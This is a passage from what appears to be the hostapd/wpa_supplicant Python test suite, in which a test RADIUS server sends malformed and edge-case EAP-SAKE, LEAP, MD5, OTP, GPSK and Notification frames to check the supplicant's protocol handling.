return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('E'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Notification/Request (same id)")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
4 + 1 + 1,
EAP_TYPE_NOTIFICATION,
ord('F'))
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected EAP-Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)
return None
srv = start_radius_server(eap_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
if ev is not None:
raise Exception("Unexpected EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP success")
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
if ev is None:
raise Exception("Timeout on EAP notification")
if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
raise Exception("Unexpected notification contents: " + ev)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP failure")
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_SAKE_VERSION = 2
EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
"""EAP-SAKE protocol tests"""
def sake_challenge(ctx):
logger.info("Test: Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
def sake_handler(ctx, req):
logger.info("sake_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_SAKE)
if ctx['num'] == 2:
logger.info("Test: Identity subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)
if ctx['num'] == 3:
logger.info("Test: Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
if ctx['num'] == 4:
logger.info("Test: Identity subtype (different session id)")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_PERM_ID_REQ, 4, 0)
if ctx['num'] == 5:
logger.info("Test: Identity subtype with too short attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 2)
if ctx['num'] == 6:
logger.info("Test: Identity subtype with truncated attribute")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4)
if ctx['num'] == 7:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, 123)
if ctx['num'] == 8:
logger.info("Test: Challenge subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)
if ctx['num'] == 9:
logger.info("Test: Challenge subtype with too short AT_RAND_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 2)
if ctx['num'] == 10:
return sake_challenge(ctx)
if ctx['num'] == 11:
logger.info("Test: Unexpected Identity subtype")
return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
if ctx['num'] == 12:
return sake_challenge(ctx)
if ctx['num'] == 13:
logger.info("Test: Unexpected Challenge subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)
if ctx['num'] == 14:
return sake_challenge(ctx)
if ctx['num'] == 15:
logger.info("Test: Confirm subtype without any attributes")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)
if ctx['num'] == 16:
return sake_challenge(ctx)
if ctx['num'] == 17:
logger.info("Test: Confirm subtype with too short AT_MIC_S")
return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 2,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 2)
if ctx['num'] == 18:
logger.info("Test: Unexpected Confirm subtype")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
if ctx['num'] == 19:
return sake_challenge(ctx)
if ctx['num'] == 20:
logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 18,
EAP_TYPE_SAKE,
EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)
return sake_challenge(ctx)
srv = start_radius_server(sake_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 14):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="SAKE", identity="sake user",
password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
finally:
stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
"""EAP-LEAP protocol tests"""
def leap_handler(ctx, req):
logger.info("leap_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 2:
logger.info("Test: Unexpected version")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 0)
if ctx['num'] == 3:
logger.info("Test: Invalid challenge length")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 4:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 8)
if ctx['num'] == 5:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 6:
logger.info("Test: Missing payload in Response")
return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
if ctx['num'] == 7:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 8:
logger.info("Test: Unexpected version in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
0, 0, 8)
if ctx['num'] == 9:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 10:
logger.info("Test: Invalid challenge length in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 0)
if ctx['num'] == 11:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 12:
logger.info("Test: Truncated challenge in Response")
return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3,
EAP_TYPE_LEAP,
1, 0, 24)
if ctx['num'] == 13:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 14:
logger.info("Test: Invalid challange value in Response")
return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0, 0, 0, 0, 0, 0)
if ctx['num'] == 15:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 16:
logger.info("Test: Valid challange value in Response")
return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
4 + 1 + 3 + 24,
EAP_TYPE_LEAP,
1, 0, 24,
0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
if ctx['num'] == 17:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 18:
logger.info("Test: Success")
return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
# hostapd will drop the next frame in the sequence
if ctx['num'] == 19:
logger.info("Test: Valid challenge")
return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 8,
EAP_TYPE_LEAP,
1, 0, 8, 0, 0)
if ctx['num'] == 20:
logger.info("Test: Failure")
return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
4 + 1,
EAP_TYPE_LEAP)
return None
srv = start_radius_server(leap_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 12):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="LEAP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
if i == 10:
logger.info("Wait for additional roundtrip")
time.sleep(1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
"""EAP-MD5 protocol tests"""
def md5_handler(ctx, req):
logger.info("md5_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_MD5)
if ctx['num'] == 2:
logger.info("Test: Zero-length challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
0)
if ctx['num'] == 3:
logger.info("Test: Truncated challenge")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_MD5,
1)
if ctx['num'] == 4:
logger.info("Test: Shortest possible challenge and name")
return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_MD5,
1, 0xaa, ord('n'))
return None
srv = start_radius_server(md5_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 4):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MD5", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_otp(dev, apdev):
"""EAP-OTP protocol tests"""
def otp_handler(ctx, req):
logger.info("otp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
if ctx['num'] == 1:
logger.info("Test: Empty payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_OTP)
if ctx['num'] == 2:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
if ctx['num'] == 3:
logger.info("Test: Challenge included")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_OTP,
ord('A'))
if ctx['num'] == 4:
logger.info("Test: Success")
return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
4)
return None
srv = start_radius_server(otp_handler)
if srv is None:
return "skip"
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 1):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="OTP", identity="user", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-OTP"])
if ev is None:
raise Exception("Request for password timed out")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-OTP-" + id + ":password")
ev = dev[0].wait_event("CTRL-EVENT-EAP-SUCCESS")
if ev is None:
raise Exception("Success not reported")
finally:
stop_radius_server(srv)
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
"""EAP-GPSK protocol tests"""
def gpsk_handler(ctx, req):
logger.info("gpsk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_GPSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown opcode")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Too short GPSK-1")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated ID_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing RAND_Server")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Missing CSuite_List")
return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Truncated CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Empty CSuite_List")
return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Invalid CSuite_List")
return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 No supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected GPSK-1")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite but too short key")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short GPSK-3")
return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3,
0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Mismatch in RAND_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
return msg
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-1 Supported CSuite")
return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 32 + 2 + 6,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_1, 0,
0, 0, 0, 0, 0, 0, 0, 0,
6, 0, 1)
idx += 1
if ctx['num'] == idx:
logger.info("Test: GPSK-3 Missing ID_Server")
msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 32 + 32,
EAP_TYPE_GPSK,
EAP_GPSK_OPCODE_GPSK_3)
msg += req[14:46]
